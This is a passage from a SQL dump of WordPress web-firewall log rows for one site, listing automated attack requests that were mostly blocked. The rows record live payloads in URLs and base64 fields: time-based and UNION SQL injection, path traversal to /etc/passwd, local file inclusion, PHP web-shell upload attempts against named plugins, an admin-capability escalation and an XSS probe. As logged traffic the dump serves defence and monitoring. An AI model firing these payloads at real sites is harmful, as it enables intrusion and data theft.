Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpdGVtX2lkXQ==\",\"paramValue\":\"MCB1bmlvbiBzZWxlY3Qgc2xlZXAoNSkgLS0gZw==\",\"path\":\"Lw==\",\"category\":\"sqli\",\"ssl\":1}'),(11964,1674796750.863702,1674796750.727000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','https://www.dailyjolly.co.uk:443/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36','blocked:waf','User Registration, User Profiles, Login & Membership – ProfilePress (Formerly WP User Avatar) 3.0.0 - 3.1.3 - Unauthenticated Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"369\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2RhaWx5am9sbHkuY28udWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"priv-esc\",\"ssl\":1}'),(11965,1674796746.146319,1674796746.013700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin.php?page=html2wp-settings',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbbG9jYWxfaW1wb3J0aW5nXVswXQ==\",\"paramValue\":\"Mkt0YkhMQ0xSZW5YZTNBa2pSMnd1M0Y0NTJzLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"file_upload\",\"ssl\":1}'),(11966,1674796745.391184,1674796745.033700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11967,1674796745.176363,1674796744.679200,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php?action=uploadFontIcon',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11968,1674796745.121815,1674796744.938900,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twcm9ncmVzc2ZpbGVd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL2Z1bmN0aW9ucy9wcm9ncmVzcy1jaGVjay5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(11969,1674796744.856785,1674796744.679000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:waf','LFI: Local File Inclusion','{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpYl9wYXRoXQ==\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(11970,1674796744.669514,1674796744.555100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tjZmdd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ncmFjZW1lZGlhLW1lZGlhLXBsYXllci90ZW1wbGF0ZXMvZmlsZXMvYWpheF9jb250cm9sbGVyLnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(11971,1674796744.532795,1674796744.399300,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWNoYXQtYnJvYWRjYXN0L3dlY2hhdC9JbWFnZS5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(11972,1674796744.461388,1674796744.268000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZHJpdmVyX2xpY2Vuc2VfaW1hZ2UyXQ==\",\"paramValue\":\"Mkt0Ykg1YWt5Y1JFS21HMXVKUnNRRHJya1pTLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11973,1674796744.325703,1674796744.172100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/forum?subscribe_topic=1+union+select+1+and+sleep%286%29',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzdWJzY3JpYmVfdG9waWNd\",\"paramValue\":\"MSB1bmlvbiBzZWxlY3QgMSBhbmQgc2xlZXAoNik=\",\"path\":\"L2ZvcnVt\",\"category\":\"sqli\",\"ssl\":1}'),(11974,1674796744.296492,1674796744.171900,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZmlsZV0=\",\"paramValue\":\"Mkt0YkY0WXNyNTB3T3FuMnpKMU9mOFQwOTdGLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haXQtY3N2LWltcG9ydC1leHBvcnQvYWRtaW4vdXBsb2FkLWhhbmRsZXIucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11975,1674809468.093236,1674809467.957600,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms-uploads/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy11cGxvYWRzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy11cGxvYWRzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11976,1674809468.080444,1674809467.957600,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms-uploads/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy11cGxvYWRzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy11cGxvYWRzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11977,1674812769.486443,1674812769.307300,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZHJpdmVyX2xpY2Vuc2VfaW1hZ2UyXQ==\",\"paramValue\":\"Mkt1N2tsbEp3WEZoSmZLUjhqM1lzbHRFZkl0LnBocA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11978,1674812769.212646,1674812769.082900,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/options-general.php?page=smartcode',NULL,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdD5jb25zb2xlLmxvZygiTnVjbGVpIC0gT3Blbi1zb3VyY2UgcHJvamVjdCBbZ2l0aHViLmNvbS9wcm9qZWN0ZGlzY292ZXJ5L251Y2xlaV0iKTwvc2NyaXB0Pg==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL29wdGlvbnMtZ2VuZXJhbC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(11979,1674812769.185553,1674812769.071600,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php',NULL,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZmlsZV0=\",\"paramValue\":\"Mkt1N2xkRWRIVFhZb2VETWYwS3NxOGFWOEVMLnBocA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy9haXQtY3N2LWltcG9ydC1leHBvcnQvYWRtaW4vdXBsb2FkLWhhbmRsZXIucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11980,1674812768.364584,1674812768.227300,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FycF90ZW1wbGF0ZV9pZF0=\",\"paramValue\":\"MSBBTkQgKFNFTEVDVCA4OTQ4IEZST00gKFNFTEVDVChTTEVFUCg2KSkpaUlpYyk=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11981,1674812768.361083,1674812768.225400,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/admin-word-count-column/download-csv.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%5C0',NULL,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZFww\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy9hZG1pbi13b3JkLWNvdW50LWNvbHVtbi9kb3dubG9hZC1jc3YucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11982,1674812768.217834,1674812768.067000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_question&question_id=1+AND+%28SELECT+7242+FROM+%28SELECT%28SLEEP%284%29%29%29HQYx%29',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1txdWVzdGlvbl9pZF0=\",\"paramValue\":\"MSBBTkQgKFNFTEVDVCA3MjQyIEZST00gKFNFTEVDVChTTEVFUCg0KSkpSFFZeCk=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11983,1674812767.951371,1674812767.843200,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin.php?page=html2wp-settings',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbbG9jYWxfaW1wb3J0aW5nXVswXQ==\",\"paramValue\":\"Mkt1N2tpa2FtMTRLN2dsNGJoQUdHdWZiYXFPLnBocA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"file_upload\",\"ssl\":1}'),(11984,1674812767.914812,1674812767.793400,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/?item_id=0+union+select+sleep%285%29+--+g&rest_route=%2Fwc%2Fv3%2Fwishlist%2Fremove_product%2F1',NULL,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpdGVtX2lkXQ==\",\"paramValue\":\"MCB1bmlvbiBzZWxlY3Qgc2xlZXAoNSkgLS0gZw==\",\"path\":\"L2Zhdmljb24uaWNvLw==\",\"category\":\"sqli\",\"ssl\":1}'),(11985,1674812767.912179,1674812767.793400,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2lkXVswXQ==\",\"paramValue\":\"MSBBTkQgKFNFTEVDVCAzMjEgRlJPTSAoU0VMRUNUKFNMRUVQKDYpKSlqZSk=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11986,1674812767.814938,1674812767.648100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=ajax_get&clinic_id=%7B%22id%22%3A%221%22%7D&props_doctor_id=1%2C2%29+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%286%29%29%29b&route_name=get_doctor_details',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twcm9wc19kb2N0b3JfaWRd\",\"paramValue\":\"MSwyKSBBTkQgKFNFTEVDVCA0MiBGUk9NIChTRUxFQ1QoU0xFRVAoNikpKWI=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11987,1674812767.769574,1674812767.643300,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1%2Csleep%286%29%2C3--+-',NULL,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0ZXJtXQ==\",\"paramValue\":\"YWFhJyB1bmlvbiBzZWxlY3QgMSxzbGVlcCg2KSwzLS0gLQ==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11988,1674812767.688284,1674812767.523500,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/cab-fare-calculator/tblight.php?controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&action=1&ajax=1',NULL,'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tjb250cm9sbGVyXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAA=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy9jYWItZmFyZS1jYWxjdWxhdG9yL3RibGlnaHQucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11989,1674812767.684905,1674812767.517000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3VzZXJfaWRd\",\"paramValue\":\"MTEgVU5JT04gQUxMIFNFTEVDVCBOVUxMLENPTkNBVCgxLG1kNSg5OTk5OTk5OTkpLDEpLE5VTEwsTlVMTCxOVUxMLE5VTEwsTlVMTCxOVUxMLE5VTEwsTlVMTCxOVUxMLE5VTEwsTlVMTCxOVUxMLS0gLQ==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11990,1674812767.635827,1674812767.516800,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php','https://www.dailyjolly.co.uk:443/favicon.ico','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36','blocked:waf','Privilege Escalation via User Meta Updates','{\"learningMode\":0,\"failedRules\":\"370\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwX2NhcGFiaWxpdGllc11bYWRtaW5pc3RyYXRvcl0=\",\"paramValue\":\"MQ==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"priv-esc\",\"ssl\":1}'),(11991,1674812767.459540,1674812767.306900,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/?post_ids=0%29+union+select+md5%28999999999%29%2Cnull%2Cnull+--+g&rest_route=%2Fpvc%2Fv1%2Fincrease%2F1',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twb3N0X2lkc10=\",\"paramValue\":\"MCkgdW5pb24gc2VsZWN0IG1kNSg5OTk5OTk5OTkpLG51bGwsbnVsbCAtLSBn\",\"path\":\"L2Zhdmljb24uaWNvLw==\",\"category\":\"sqli\",\"ssl\":1}'),(11992,1674812767.128897,1674812767.006100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+%28SELECT+6881+FROM+%28SELECT%28SLEEP%286%29%29%29iEAn%29',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttb250aF0=\",\"paramValue\":\"MSBBTkQgKFNFTEVDVCA2ODgxIEZST00gKFNFTEVDVChTTEVFUCg2KSkpaUVBbik=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11993,1674812767.070788,1674812766.867700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=mec_load_single_page&time=1%29%29+UNION+SELECT+sleep%286%29+--+g',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aW1lXQ==\",\"paramValue\":\"MSkpIFVOSU9OIFNFTEVDVCBzbGVlcCg2KSAtLSBn\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11994,1674812767.009136,1674812766.873100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W29yZGVyX2lkXQ==\",\"paramValue\":\"MSBVTklPTiBBTEwgU0VMRUNUIE5VTEwsTlVMTCxOVUxMLE5VTEwsTlVMTCxOVUxMLE5VTEwsQ09OQ0FUKDB4NzE3YTc2NzY3MSwweDY4NTc0MTQxNmM0MzY2NTQ2OTRkNDQ2ZDQxNmY3MTdhNmI1NDcwNGE0NTdhNTA3NzU2NDY1MzYxNDk3MDY2NDE2NjY0NjY1NDY5NmU3MjRkLDB4NzE3MTc4NmI3MSksTlVMTC0tIC0=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11995,1674812767.004735,1674812766.868700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2lkX2Zvcm1d\",\"paramValue\":\"MSBVTklPTiBBTEwgU0VMRUNUIE5VTEwsTlVMTCxtZDUoOTk5OTk5OTk5KSxOVUxMLE5VTEwsTlVMTCxOVUxMLE5VTEwtLSAt\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(11996,1674812766.998351,1674812766.866900,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:waf','LFI: Local File Inclusion','{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpYl9wYXRoXQ==\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(11997,1674812766.998147,1674812766.867000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Windows NT 10.0) 